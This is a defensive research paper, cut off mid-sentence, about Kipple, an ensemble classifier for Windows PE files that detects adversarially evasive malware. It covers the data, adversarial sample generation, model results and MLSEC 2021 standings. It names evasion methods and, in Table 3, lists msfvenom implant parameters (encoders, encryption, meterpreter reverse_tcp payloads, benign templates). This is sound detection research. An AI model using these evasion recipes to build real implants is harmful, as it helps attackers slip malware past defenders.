Kipple: Towards accessible, robust malware classification
                                             Andy Applebaum∗

                                        The MITRE Corporation†


                                                   Abstract
            The past few decades have shown that machine learning (ML) can be a powerful tool
        for static malware detection, with papers today still purporting to eek out slight accuracy
        improvements. At the same time, researchers have noted that ML-based classifiers are
        susceptible to adversarial ML, whereby attackers can exploit underlying weaknesses in ML
        techniques to specifically tailor their malware to evade these classifiers. Defending against
        these kinds of attacks has proven challenging, particularly for those not steeped in the field.
            To help tighten this gap, we have developed Kipple, a Windows Portable Executable (PE)
        malware classifier designed to detect attempts at evasion. Kipple uses a portfolio of classifiers,
        building on a primary classifier designed to detect “normal” malware by attaching classifiers
        designed to specific types of adversarial malware to it. While simplistic, this approach is able
        to make it significantly harder – though not impossible – to bypass the primary classifier.
            This paper reports on our process developing Kipple, specifically highlighting our method-
        ology and several notable conclusions, including how our ensemble approach outperforms one
        using simple adversarial retraining and other performance notes. Our hope with publishing
        this paper is to provide an example defense against adversarial malware, and to also more
        broadly make the field more accessible to newcomers; towards this larger goal, we include a
        set of “lessons learned” for newcomers to the field, as well as an open-source software release
        containing Kipple’s models, the data it was built from, and various scripts used to help
        generate it.


1       Introduction
Static detection of malware files is an ongoing area of research within the security community.
While traditionally an “old-school" approach, static detection offers many advantages, principally
that by scanning files to see if they’re malicious we can quarantine them before they execute and
run malicious commands. Early malware detection approaches were simple, originally keying off
of known details about a file, such as its MD5 hash or known malicious strings held in its binary
representation. Today, more modern approaches use various machine learning (ML) approaches
to perform more advanced static detection.
    Unfortunately, ML algorithms and technologies can be susceptible to adversarial examples,
wherein an adversary perturbs an input object in a way that keeps the object semantically
consistent (i.e., it is still the same) but the classifier is no longer able to properly identify it.
Much of the research in this space has focused on computer vision as the exemplar domain, but
the research community has, over the past few years, also looked at how it can apply to malware
detection. For example:
    ∗
    aapplebaum@mitre.org
    †
    The author’s affiliation with The MITRE Corporation is provided for identification purposes only and is not
intended to convey or imply MITRE’s concurrence with, or support for, the positions, opinions, or viewpoints
expressed by the author. Approved for Public Release; Distribution Unlimited. Public Release Case Number
21-3931.


Copyright © 2021 The MITRE Corporation. Use permitted under Creative Commons License
                         Attribution 4.0 International (CC BY 4.0).
 Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                                  A. Applebaum


        • Rosenberg et al. [18] propose to generate adversarial malware by using explainable artificial
          intelligence (AI), identifying what features should be perturbed to make a sample evasive.

        • Li et al. [13] generate adversarial Android malware by using generative adversarial networks
          (GANs), bypassing previously proposed defenses.

        • Hu and Tan [11] show how to attack a recurrent neural-network (RNN) based malware
          classifier by substituting a victim classifier and generating adversarial examples against it.
    Many others abound in the literature as well – including many with accompanying open
source code.
    Unfortunately, defenses against these attacks are limited: both conceptually, as in there not
being any clear way to defend against adversarial example attacks, but also practically, in that
there are more papers purporting to attack models than to defend them. Moreover, in browsing
the open source availability, we find that there’s been little code – or models – published to help
defenders secure their systems against these kinds of attacks. This is problematic, and shows the
asymmetric capabilities around and/or interest in defending ML-based classifiers.
    In this paper, we seek to bridge this gap, walking through our own attempts to build a robust
malware classifier we term “Kipple”. While our approach is imperfect, we believe that increasing
the amount of discourse in this space, publishing lessons learned for newcomers, and highlighting
potential areas for future research, we can help advance the state of the art in defending against
evasive malware. Additionally, we have publicly released our code, data, and models online:
https://github.com/aapplebaum/kipple.


2        Overview
Kipple originated as a small personal project entered into the 2021 Machine Learning Security
Evasion Competition (MLSEC)1 . The competition features a “defender” and an “attacker” track,
where in the former participants submit ML models designed to detect malicious Windows
Portable Executable (PE) files, and in the latter participants seek to evade the user-submitted
classifiers by leveraging obfuscation and adversarial ML techniques. For submission into the
defender track, the goal is to build a classifier that achieves no more than 1% false positive rate
with no more than 10% false negative rate on normal malware, trying to minimize the number of
evasions in the second track.
     Because Kipple was implemented as a side project, the initial effort was small, running only
on a personal computer and having the ultimate goal of merely submitting an entry regardless of
its performance. Originally the impetus for Kipple was to leverage ideas from differential privacy
as a defense against adversarial examples [15], but this early approach was dropped after poor
performance testing against normal malware2 .
     Instead, we adopted a more straightforward hypothesis: many adversarial malware construc-
tion techniques are easily distinguishable from traditional benign and malicious Windows PE
files, and if we create an ensemble classifier consisting of a traditional malware classifier and a
set of classifiers designed to detect adversarial malware, we can greatly increase the efficacy of
the initial classifier. Doing this, we need not specifically evade our initial classifier, but rather
generate many instances of the adversarially generated examples and train a new classifier on
those.
     To implement this, our approach worked as follows:
    1. Create an initial classifier designed to detect “normal” malware;

    2. Create a set of adversarial malware, using a variety of approaches and resources to do so;
    1
        https://mlsec.io/
    2
        A longer write-up on this approach and its shortcomings is left for future work.


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                               A. Applebaum


              Table 1: Number of samples per data source for existing/external data sets.

         Source              Format          Label       Training Size   Testing Size    Count
         Ember           Feature Vector     Malware         300000          100000       400000
         VirusShare         Binaries        Malware          N/A             N/A           7662
         SoReL              Binaries        Malware          N/A             N/A          31914
         MLSEC 2019         Binaries        Malware          N/A              50            50
         MLSEC 2020         Binaries        Malware          N/A              50            50
         MLSEC 2021         Binaries        Malware          N/A              50            50
         Ember           Feature Vector    Unknown          200000           N/A         200000
         Ember           Feature Vector      Benign         300000          100000       400000
         Local              Binaries         Benign          2191             379         2570
         MLSEC 2019          Binaries      Adversarial       N/A             544          544


    3. Produce a separate classifier for each set of adversarial malware; and

    4. Create an ensemble classifier leveraging the initial classifier and each adversarial classifier.

   In the remainder of this paper, we walk through our process for each step, starting with
data creation and identification, building and testing the initial classifier, and then creating
the separate and ensemble classifiers. As part of this last step, we walk through the different
performance results for each of the different options we investigated for our ensemble.


3        Data
This section covers the data used to generate and test Kipple, breaking it down by source.
Broadly speaking, we consider two primary classes for data: samples obtained from external
sources – termed “original samples" – and samples generated as part of adversarial example
construction, frequently referred to as “variants". Within both sets, most of the samples were
known to be either benign or malicious, although a small portion of the original sample data was
unlabeled.
   The rest of this section discusses the source, count, and methodology for generating the data,
with Table 1 providing summary statistics for the normal/original/non-adversarial samples, and
Table 2 providing summary statistics for the adversarially generated samples/variants.

3.1       Original Samples
We leverage the 2018 EMBER3 data set [1] as the core data for our approach. This data includes
feature vectors for 1 million PE files scanned in or before 2018, categorized into if the file was
benign, malicious, or unknown. The EMBER data set provides a solid base to build a classifier
from, but because it is provided as feature vectors and not as binaries themselves, our ability to
construct a more robust classifier from the EMBER data is limited. To remediate this, we look
to external sources to provide binaries which can be used to construct adversarial malware.

3.1.1       VirusShare
We first investigated the free VirusShare platform4 as a source for original malware samples.
While the platform offers bulk downloads, due to size limitations – discussed further in Section 7
    3
        https://github.com/elastic/ember
    4
        https://virusshare.com/


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                         A. Applebaum


– we opted to use the website’s API to obtain individual samples one at a time. This option
required us to specify an MD5 or SHA256 value for the sample we wanted; to get a list of relevant
hashes, we consulted the EMBER data set, resulting in us downloading the actual samples
referenced by EMBER. Unfortunately, the API limits the number of requests you can make to
one malware sample per 15 seconds; ultimately, after a period of a few weeks we were able to
obtain roughly 7500 samples in total.

3.1.2      SoReL
The SoReL5 data set [10] contains the features and metadata of roughly 20 million different
PE files, half of which are malware and the other half benign. In addition to feature vectors,
SoReL also provides several pretrained models, and most importantly for our work, access to the
roughly 10 million malware instances for download. We do note, however, that as a precaution
the SoReL authors modified the hosted binaries to be non-executable, potentially altering each
instance’s representation and features.
    Unfortunately, due to local space constraints, downloading the feature vectors provided by
SoReL was prohibitive – when compressed, the features take up roughly 72GB of disk space,
with the malware instances themselves requiring 8TB of space. While the features themselves are
not particularly prohibitive for consumer hardware, design decisions made when provisioning the
Kipple training machine prevented its download at the time; moreover, training such a model
that makes use of all of the SoReL data could prove difficult using consumer hardware.
    Instead, we took a simple approach of randomly downloading malware instances one at a
time. Through this process, we were about to acquire roughly 32000 malware instances, with
delays from self-imposed and external factors including rate-limiting and download speeds.

3.1.3      Local Files
We were able to pool together roughly 2600 benign files from the author’s personal computer
that were accumulated over a period of ten or so years. These files would be used primarily for
developing adversarial examples later in the next section, and were not used for actual training;
the split between training and test here reflecting which files were used for adversarial example
construction.

3.1.4      MLSEC Data
As an entry into MLSEC 2021, we obtained three small labeled data sets:

       • MLSEC 2019 data, including 50 normal malware instances used during the 2019 challenge,
         and 545 malware variants submitted by contestants during the competition.

       • MLSEC 2020 data, including 50 normal malware instances used during the 2020 challenge.

       • MLSEC 2021 data, including 50 normal malware instances used for the 2021 challenge.

None of these files were used for training, with the 2019 data used as the primary metric for
accuracy for Kipple during development.

3.2      Adversarially Generated Samples
We took three different approaches to generate adversarial malware samples; for two of these
three, we leveraged public libraries designed to create adversarial examples against ML-based
malware classifiers. For the third, we leveraged prior research looking at evading ML-classifiers
using more traditional obfuscation techniques.
   5
       https://github.com/sophos-ai/SOREL-20M


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                                     A. Applebaum


Table 2: Number of samples per data source and generation technique for adversarial malware.
Note that all samples are binaries and malicious.

         Source                  Generation Technique        Training Size     Testing Size     Count
         SoReL                       MalwareRL                   37053              500         37553
         SoReL                        GAMMA                       4651              516          5167
         SoReL                     DOS Manipulation              2331               259          2590
         SoReL                        Small Pad                   125               100          225
         SoReL                        Large Pad                    177              100           277
         VirusShare                  MalwareRL                   24081              500         24581
         VirusShare                   GAMMA                      5066               563         5629
         VirusShare                DOS Manipulation              2533               281         2814
         VirusShare                   Small Pad                  2112               235         2347
         VirusShare                   Large Pad                  2533               282         2815
         msfvenom                   No Added Code                 5296             588           5884
         msfvenom                    Added SoReL                 32633             1000         33633
         msfvenom                  Added VirusShare              6852               762          7614
         MLSEC 2019-2021              MalwareRL                     0              1433          1433
         MLSEC 2019-2021            SecML Malware                   0               746          746


3.2.1      MalwareRL
Our first approach leverages the MalwareRL [4] open source software package6 . This package
is an extension of prior work in [2], which originally sought to create a framework to develop
reinforcement learning-based agents that can modify malware to make it evade an ML-based
classifier; the updated MalwareRL package contains much of the original functionality of the
original package, updating it to use a newer version of Python and newer libraries, adding actions,
and providing better maintenance.
     The core idea of MalwareRL is that we can chain together small modifications to PE files in
such a way as make them evasive, with the goal being to create intelligent agents that are able
to efficiently select action chains. Out of the box, MalwareRL includes an implementation of 16
file-modification actions, an agent that makes decisions randomly, and an implementation of the
MalConv [17] detection model as specified in [1]. During a trial, the MalwareRL environment
will randomly select a malware instance and apply modifications as per the agent’s decision-
mechanism, stopping if too many modifications are made or if the modified sample evades the
classifier.
     We ran MalwareRL off and on over a period of a month using the included random agent
and MalConv classifier. As input, we provided the VirusShare and SoReL binaries downloaded
in the prior section. Additionally, we leveraged the local benign “train” data as input to several
of MalwareRL’s actions (e.g. – the add_section_strings action used strings from our local data).
During each trial, if the agent was able to successfully evade the classifier, we would save the
file. To prevent some over-fitting, we recorded at most about 10 different evasive variants per
sample7 . The final counts for each of the VirusShare and SoReL data sets are listed in Table 2
with “MalwareRL” as the generation technique. Note that due to project constraints, we did not
save the list of modifications used for each trial.
  6
      https://github.com/bfilar/malware_rl
  7
      This cutoff changed throughout the project, both to be higher and to be lower, but hovered around 10.


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                          A. Applebaum


 Table 3: Parameters used for implant generation; variation based on architecture not shown.

         Field           Parameters
         Platform        Windows
         Architectures   x86, x64
         Encoders        none, xor, xor_dynamic, shikata_ga_nai
         Encryption      none, aes256, base64, rc4, xor
         Payload         shell/bind_tcp, meterpreter/reverse_tcp, meterpreter/bind_tcp
         Template        Local benign train data
         Added Code      None, VirusShare, SoReL


3.2.2     SecML Malware
Like MalwareRL, the SecML Malware [6] package is designed to provide functionality to create
adversarial attacks against Windows PE malware detectors8 . SecML Malware differs, however, in
that its attacks are end-to-end and are not intended to be chained together, providing a variety of
different white-box and black-box attacks. To use the library, users need only provide the input
malware and some benign samples to build from, with the package able to construct adversarial
examples from there. By default, SecML Malware attacks an included instance of MalConv
similar to MalwareRL.
    We leverage three classes of attacks from the package:

      • GAMMA attacks [8], including both the shift and section injection attacks;

      • DOS manipulation [7], defaulting to partial as opposed to full; and

      • Padding attacks [12], including a “smaller” version that pads a random number of bytes
        less than 100, and a “larger” version that pads a random number of bytes less than 1000.

    We ran SecML Malware off and on over a period of a month using the above attacks against the
default MalConv classifier. As input, we provided the VirusShare and SoReL binaries, leveraging
the local benign “train” data as goodware, similar to for MalwareRL. Unlike MalwareRL, we
saved each resulting sample regardless of it was evasive or not. Anecdotally, we saw that the
padding attacks were not producing effective results, and stopped generating examples later in
our generation process.

3.2.3     msfvenom
MalwareRL and SecML Malware are both designed to modify PE files to make them evade
classifiers; while these approaches are effective, we also wanted to investigate hardening our
model with more obfuscated malware instances and techniques. Towards this, we decided to
build on prior work in [3] where they created evasive implants by leveraging the open source
msfvenom utility9 . We followed a similar approach, randomly choosing parameters based on the
values in Table 3, with our local benign training examples as templates, and embedding either
no code, a VirusShare instance, or a SoReL instance of malware. While prior work suggested
the use of templates would make the resulting implants evasive, we believed that including the
malware instances as “added-code” would make it easier for the classifier to detect the implant,
and also more robust from a training perspective.
  8
      https://github.com/pralab/secml_malware
  9
      https://www.offensive-security.com/metasploit-unleashed/msfvenom/


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                                    A. Applebaum


     Table 4: Accuracy for the base model against original samples at a 1̃% false positive rate.

         Source                         Label        Number Correct       Total Samples       Accuracy
         EMBER Test                    Benign              99019               100000           99.0%
         Local                         Benign               2509                2570            97.6%
         EMBER Test                   Malware              96486               100000           98.5%
         VirusShare                   Malware               7651                7662            99.9%
         SoReL                        Malware              28809                31914           90.3%
         MLSEC 2019                   Malware                50                  50             100%
         MLSEC 2020                   Malware                49                  50              98%
         MLSEC 2021                   Malware                50                  50             100%
         MLSEC 2019                 Adversarial             293                 544             53.8%
         MLSEC MalwareRL            Adversarial             811                 1433            56.6%
         MLSEC SecML Malware        Adversarial             570                  746            76.4%


3.3        Building Test Sets
We originally intended to split each data set generated in Section 3.2 into a set of samples used for
“training” and a set of samples used for “testing,” with the latter being the primary performance
metric to evaluate each model. This split is illustrated in Table 2.
    Unfortunately, in practice the split was challenging to execute: as it turns out, almost all
new models trained on the adversarially generated variants scored 100% on the test data. After
some analysis we saw that this was due to overlap between the test and training data: while no
sample itself was present in both sets, it was often the case that an original sample had distinct
but similar variants in each, and thus many classifiers were indirectly exposed to some of the
testing data during the training phase.
    To remediate this, we created two additional data sets used specifically for testing, represented
in the last two rows of Table 2. Both data sets leveraged the MLSEC 2019, 2020, and 2021
normal malware samples as the starting malware; because none of the classifiers were trained
on this data, there was no chance for pre-identification of the variants. In the first set, termed
MLSEC MalwareRL, we leveraged the MalwareRL framework to conduct a small set of 1433
variants of the original MLSEC samples. In the second set, termed MLSEC SecML Malware,
we leveraged the SecML Malware library to build a set of 746 variants, including the GAMMA,
DOS manipulation, and padding approaches.


4        Testing and Building a Base Model
We built a base model following the most recent EMBER code and publication [16], using a
gradient boosted decision tree (GBDT) implemented in LightGBM10 (LGBM). For our base
model, we only used the EMBER malicious and benign training sets, choosing parameters similar
to that [16]11 . We fix the threshold for our model to 0.85, using the EMBER benign test data to
match the 1% false positive rate required for submissions to the MLSEC defender track.
    Table 4 shows the accuracy of our model for each of the original sample data sets. Looking
at the benign data, we see that we hit 99% accuracy for the EMBER data as expected given our
threshold, but only 97.6% for the local benign data; we suspect this slight drop is due to the
nature of the local binaries, as some of them included author-written code and other academic
    10
    https://lightgbm.readthedocs.io/en/latest/Python-Intro.html
    11
    Unfortunately the exact configuration was lost, but we believe it is the same as the source on slide 16 but
with a lower number of leaves.


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                            A. Applebaum


      Table 5: Accuracy for the base model against the adversarially generated samples.

      Source        Generation Technique      Number Correct      Total Samples    Accuracy
      SoReL             MalwareRL                  22102              37553          58.9%
      SoReL              GAMMA                     3079                5167          59.6%
      SoReL           DOS Manipulation              2312               2590          89.2%
      SoReL              Small Pad                   214               225           95.1%
      SoReL              Large Pad                  260                 277          93.9%
      VirusShare        MalwareRL                  20512              24581          83.4%
      VirusShare         GAMMA                      4547              5629           80.8%
      VirusShare      DOS Manipulation              2803              2814           99.6%
      VirusShare         Small Pad                 2337               2347           99.6%
      VirusShare         Large Pad                  2805              2815           99.6%
      msfvenom         No Added Code                 639              5884           10.9%
      msfvenom          Added SoReL                 7643              33633          22.7%
      msfvenom        Added VirusShare              1847               7614          24.3%


files. Looking at malware, we can see the classifier has fairly strong results, correctly classifying
98.5% of the EMBER test malware, 99.9% of the VirusShare malware, and missing only one out
of the 150 MLSEC base malware files.
     The SoReL malware proves much more interesting: even without any obfuscation, the classifier
only is able to correctly identify 90.3% of the instances. While this meets our 10% false negative
goal, it still falls short as opposed to the other sets. We posit this may be due to the model
being poor in general, the SoReL malware being particularly hard to classify (i.e., significantly
different than the EMBER training data due to it being more recent), or the modifications made
to the SoReL binaries to make them inactive causing them to appear as benign.
     The last data sets are the adversarial samples. Here, the classifier performs poorly on both
the MLSEC 2019 adversarial malware and the MLSEC MalwareRL variants, correctly identifying
53.8% of the former and 56.6% of the latter. While the classifier performs better on the MLSEC
SecML Malware set – identifying 76.4% of the samples – the poor performance on the other
sets indicates that while the base classifier may be strong against “normal" malware, it’s likely
susceptible to adversarially crafted ones. We note that the better performance in the SecML
Malware set is likely due to the ease in which it can identify some of the individual SecML
Malware attacks.
     Indeed, this conclusion is reinforced by looking at Table 5, which reports the accuracy of our
base classifier against the new samples we generated in the previous section. First, looking at
the bottom of the table, we can see that the base classifier is very weak against the msfvenom
samples, only correctly classifying 10.9% of the ones generated without added code. Contrary to
our expectations, we don’t see that adding code makes it much easier for the classifier to identify
the implant, scoring only 22.7% accuracy when a SoReL sample is added, and 24.3% accuracy
when a VirusShare sample is added. While highlighting a significant gap in our classifier, this
does align with the conclusion from prior work suggesting the msfvenom template option was
particularly effective as an evasion technique.
     Moving up the table, we see the classifier perform reasonably well on the VirusShare examples,
identifying the DOS Manipulation and both padding techniques nearly at nearly 100%. The
GAMMA attack is the strongest of the five, with the classifier correctly identifying 80.8% of the
instances, with the MalwareRL approach as second-strongest with 83.4% accuracy.
     The SoReL examples prove more problematic for the classifier. First, for the MalwareRL case,
we see it only correctly identify 58.9% of the samples – a much lower value than for VirusShare.


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                           A. Applebaum


Similarly, GAMMA is just about nearly as effective, with the classifier only identifying 59.6% of
the samples. The DOS Manipulation case is not as dire, with the classifier spotting 89.2% of
the cases, and the two padding cases both show improvement over the prior three, although not
nearly as much as for the VirusShare case.
     One interesting trend apparent from looking at the SoReL and VirusShare cases is how much
better the classifier performs on the latter. This can be explained by examining the methodology
behind gathering the samples: the SoReL data were selected randomly, whereas the VirusShare
data was selected by pulling hashes from the EMBER data. Thus, it’s likely that the classifier
was indeed trained on the original malware sample used as part of the submission, and thus might
be more famliar with the adversarial one. If this is the case, it shows an interesting potential gap
in detection – we would expect the VirusShare GAMMA and MalwareRL accuracies to be higher
if indeed the classifier was trained on the underlying non-modifying malware; 80% accuracy on
adversarial examples perturbed from data the classifier was trained on seems rather low.
     As one last stray obseravation, we note that the MalwareRL and SecML Malware samples were
all generated targeting the MalConv classifier, one that uses a completely different architecture
than our base case, though does use the same training data. Still, looking at the SoReL case, we
find it interesting that e.g. 58.9% of the MalwareRL samples were transferable from the MalConv
classifier to our GBDT one. We believe that this ease of transferability can have implications for
future ML-based detection approaches.


5     Model Development
In this section we discuss how we build on the base model to make it more robust to adversarial
attacks, focusing on the different options tested and the performance of each. This includes a
model using adversarial retraining, individual models built from the EMBER data set and the
new adversarial samples, and different portfolio options that leverage multiple models. Table 6
shows the final results for each model.

5.1     Retraining
Our first defensive approach is to try adversarial retraining. In this approach, we leverage a
GBDT similar to as for Section 4, with 1000 iterations, 1024 leaves, a bagging and feature fraction
of 0.5, and a learning rate of 0.005. We then train the classifier with the following data:

     • The original EMBER benign data as benign;

     • The original EMBER unknown data as discarded;

     • The original EMBER malware data as malicious; and

     • All new adversarial samples as malicious.

Similar to as in Section 4, we set a cutoff to ensure only 1% false positive on the EMBER test
data, using a threshold of .75.
    The second row (labeled Retrained ) within Table 6 shows the results for the retrained model.
Here, we see some initiall loss of performance as opposed to the base model: we have a lower
accuracy for the local benign data set, a lower accuracy for the EMBER test malware set, and
a lower accuracy for the MLSEC malware data. However, we do see a pronounced increase
of 2̃0% accuracy across each of the 2019, MalwareRl, and SecML Malware adversarial test
sets. Whether this increase is worth the small decrease – 4̃% – in normal malware is likely
application-dependent, though in most cases it would seem that the additional coverage is likely
worth the small performance hit.


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                          A. Applebaum


Table 6: Accuracy for each setup in Section 5, with each row representing a model and column
representing a data set. Note that each row/model has an accuracy of 99% on the EMBER
benign test data.
                                                 Benign      Malware        Adversarial MLSEC
 Row    Model Name/Composition                   Local    EMBER MLSEC     2019   Mal-RL SecML
   1    Base                                     97.6%    98.5%   99.3%   53.8%   56.6%   76.4%
   2    Retrained                                78.0%    94.4%   96.7%   76.7%   84.0%   86.6%
  3     adversarial-all                          41.7%    4.3%    16.0%   52.6%   60.3%   47.9%
  4     adversarial-benign                       40.1%    53.8%   77.3%   86.6%   84.3%   88.6%
  5     variants-all                             95.3%    9.3%    43.3%   78.3%   89.9%   71.6%
  6     variants-benign                          95.5%    60.6%   87.3%   88.2%   91.0%   94.4%
  7     msf-all                                  29.3%    0.4%      4%     8.1%   4.9%    15.8%
  8     msf-benign                               24.5%    6.7%    50.7%   20.4%   35.5%   59.4%
  9     undetect-all                             21.6%    0.4%    46.7%   15.6%   39.4%   55.0%
  10    undetect-benign                          72.3%    0.6%     4.0%    0.6%   2.6%     8.7%
  11    Base, adversarial-all                    41.7%    96.0%   100%    83.1%   66.4%   94.6%
  12    Base, adversarial-benign                 41.4%    96.0%   100%    86.0%   70.6%   96.2%
  13    Base, variants-all, msf-all              37.5%    94.7%   96.7%   88.0%   84.9%   95.0%
  14    Base, variants-all, msf-benign           36.4%    95.3%   98.7%   88.6%   84.2%   95.7%
  15    Base, variants-benign, msf-all           37.5%    95.6%   100%    88.6%   78.3%   95.0%
  16    Base, variants-benign, msf-benign        28.5%    93.9%   98.7%   90.8%   81.1%   95.2%
  17    Base, variants-all, undetect-all         28.8%    92.5%   93.3%   91.7%   89.0%   95.9%
  18    Base, variants-all, undetect-benign      70.5%    92.7%   92.0%   89.3%   85.2%   95.0%
  19    Base, variants-benign, undetect-all      28.8%    95.6%   100%    91.0%   84.5%   99.3%
  20    Base, variants-benign, undetect-benign   70.5%    95.7%   100%    88.6%   78.8%   97.2%


5.2    Individual Models
Our second approach is to develop a set of individual models that do not label the EMBER set
the same as the adversarial set. We specifically choose one of two paradigms for these models:

   • All. Under this approach, we consider all EMBER data as benign, and all new adversarial
     samples as malicious. This approach tests/assumes that our new variants will have different
     signatures as opposed to the existing malware and benign data.

   • Benign. Under this approach, we only consider the benign EMBER data as benign,
     ignoring all others (i.e., malicious, unknown). This approach specifically tries to construct
     a classifier that distinguishes between benign files and adversarial malware, without any
     training on normal malware.

Within these two categories, we create four different variations on the set of training data we
want to use for adversarial samples:

   • Adversarial. This set includes all adversarial samples.

   • Variants. This set includes all samples generated with MalwareRL and SecML Malware.

   • msf. This set includes all of the msfvenom samples.

   • undetect. This set only includes the msfvenom samples that were flagged as benign by
     the Base classifier in Section 4.

This results in 8 different models, each of which is trained as a GBDT, with the adversarial
and variants cases using the same parameters as the Retrained model and the msf and undetect
cases modifying the number of leaves to 512 and number of iterations to 500. We further fix

  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                                      A. Applebaum


each model’s threshold to match the minimum needed to score a 1% false positive rate on the
EMBER test data.
     Rows 3-10 in Table 6 provide the results for each of the 8 models. First, we note that for each
of the adversarial, variants, and msf models, the “all” case significantly under-performs versus the
“benign” case. This is to some extent to be expected under this setup, as the classifier is unaware
of what normal malware looks like; this is perhaps most evident with the adversarial-all model,
where the classifier only correctly identified 4.3% of the EMBER test malware data. Interestingly,
the undetect category does not follow this pattern, with the all case outperforming the benign
case. We posit this may be due to the undetect samples appearing more like benignware – since
they evaded the Base classifier – and thus the all case better discriminates between normal PE
files and PE files designed specifically to look benign.
     Looking at the best case for each model type – focusing on “benign” for adversarial, variants,
and msf, and on “all” for undetect – we see that msf and undetect perform the worst, performing
quite poorly on the EMBER malware test set (6.7% for msf and 0.4% for undetect) and under-
performing the Base classifier for each adversarial set. Both classifiers also score poorly with the
local benign data (2̃0% accuracy each) likely due to some of the local benign files having some
variations present in both the test and train data12 This idea is corroborated by looking at the
variants and adversarial local benign scores as well: variants correctly identifies 95.5% of them,
and adversarial falls in the middle at 40.1%.
     On the other end of the spectrum, variants-benign is clearly the strongest, scoring highest for
EMBER malware, MLSEC malware, and even the adversarial MLSEC data. Indeed, this classifier
by itself is almost able to hit the 10% false negative threshold for that data. As runner-up,
adversarial-benign is a little less performant, having a lower accuracy across each data set but
falling within a reasonable 2% of variants-benign on the adversarial MLSEC 2019 data.

5.3       Portfolio Approaches
Moving past individual models, we investigate whether we can use a “portfolio” of models, focusing
on a few combinations. Here, we set a threshold for each model in the portfolio; if at least one
model flags a file as malicious, we record malicious. If none classify it as malicious, then we score
it as benign. To set each model’s threshold, we look at all threshold combinations that ensure
that the total false positive rate is 1%13 ; then, we find the best pair (or, if a portfolio of three
models, the best triple) to maximize the detection rate for the MLSEC data, ensuring we the
thresholds score at least 90% for the EMBER malware set. Rows 11 through 20 of Table 6 show
the results for our portfolio arrangement.
    We only test two portfolios of size two: the Base model along with either adversarial-all or
adversarial-benign. These two portfolios score roughly equally, with the benign configuration
slightly outperforming the all configuration for the adversarial MLSEC samples. Notably, both
portfolios offer benefits over their singleton counterparts: versus the Base profile by itself, each
portfolio option provides much stronger coverage of the adversarial MLSEC data, at a cost of
only a few percentage points off of the EMBER malware set. However, the portfolio does struggle
with the local benign data, likely due to the included msfvenom data. Against the adversarial
singletons, the portfolios perform much better across the board, with only the adversarial-benign
case scoring near the portfolio for the adversarial MLSEC data.
    The last 8 rows of Table 6 correspond to the eight portfolios of size three that we tested.
Here, each portfolio includes the Base profile along with a version of the variants model and
either a version of the msf model or a version of the undetect model. Interestingly, we when
combined into a portfolio, we now see the all and benign cases each more competitive with their
respective counterparts, scoring roughly similar across categories for each. Indeed, most of the
  12
       As an example, the same binary might be present in both but with different filenames.
  13
       Nothing that a lower false positive rate would indicate a higher true positive rate.


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                             A. Applebaum


size three portfolios seem roughly on par with each other, and all of them largely outperform the
size two portfolios, the Retrained model, and the Base model.
    That said, there are some differences: even in the size three portfolio set the msf cases (rows
13 through 16) are not as strong as the undetect cases (rows 17-20). Within the latter set, two
options stick out as the strongest. First, against the adversarial samples, {Base, variants-all,
undetect-all } would appear the strongest, performing best on the 2019 and Malware RL data sets,
and within a small distance of the best score for the SecML Malware data set. More well-rounded
however is the {Base, variants-benign, undetect-all } portfolio. This option performs better by a
few percentage points on the normal EMBER and MLSEC sets and still is the second-highest
scorer for the adversarial samples.


6        MLSEC 2021 Performance
In this section we discuss Kipple’s performance in the MLSEC 2021 event, covering what the
final submission looked like and taking a critical analysis towards its performance.

6.1      Submission
We ultimately entered “Kipple” into the 2021 MLSEC competition using the {Base, variants-all,
undetect-benign} configuration; this decision was made somewhat arbitrarily and was due to
some miscalculations on performance before submission. Additionally, we made several changes
to make the model more performant.
     First, in local testing, we realized that Kipple struggled to correctly classify some benign
binaries; specifically the local ones similar to the ones used to build it. To hedge against this, we
first raised the undetect-benign model within the portfolio to have a much higher threshold; this
largely stopped it from misclassifying these files. Still, to make the approach even more effective,
we hardcoded in the specific MD5 values of the binaries it was trained on, bypassing the model
entirely and returning “benign” if a file was submitted that matched the hash.
     Second, we leverage the MLSEC-provided code14 implementing a “stateful" detection system
as described by Chen et al. [5]. This model works by keeping a “history” of prior queries that
were flagged as malware; when a new query is sent to the classifier, if it is identified as malicious,
the classifier stores it and returns malicious. If it is instead identified as benign, it is compared
to the history of prior malicious queries; if within a certain distance of an existing prior query, it
flags the submission as malicious.
     Our submission followed the default implementation, but differed in that it added a query to
the history if and only if the variants-all model flagged it as malicious, ignoring whether the
submission was flagged by Base or undetect-benign. While including the other models would
likely have been more accurate, we did not have adequate time to test this approach and did not
want to increase our false positive rate.

6.2      Results
Kipple ultimately took third in the defensive track, with a score of 231 bypasses; the winner [9]
had 162 bypasses, second place [14] had 193, and fourth, fifth, and sixth place had 714, 734, and
1840 respectively. While an overall strong performance, Kipple did have several shortcomings.
    First, looking at the results in Table 6, Kipple is not perfect: it still misses a good portion
of the MalwareRL and SecML Malware attacks. Indeed, during the competition the authors
inadvertantly evaded Kipple by using MalwareRL during the attacker track.
    14
    https://github.com/Azure/2021-machine-learning-security-evasion-competition/blob/main/
defender/defender/models/ember_model.py#L114


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                          A. Applebaum


    Second, and perhaps more importantly, Kipple has very little knowledge of traditional malware
obfuscation techniques. In self-testing, the authors found that many off-the-shelf packers and
crypters were able to sufficiently obfuscate the MLSEC samples as to bypass Kipple’s detection.
While some of these approaches used some novelty, many of them were simple open-source scripts
and easy to run. In fact, the winners of the attacker track [9] – who also won the defender track –
recognized this, and were able to score the most evasions using a custom dropper they developed,
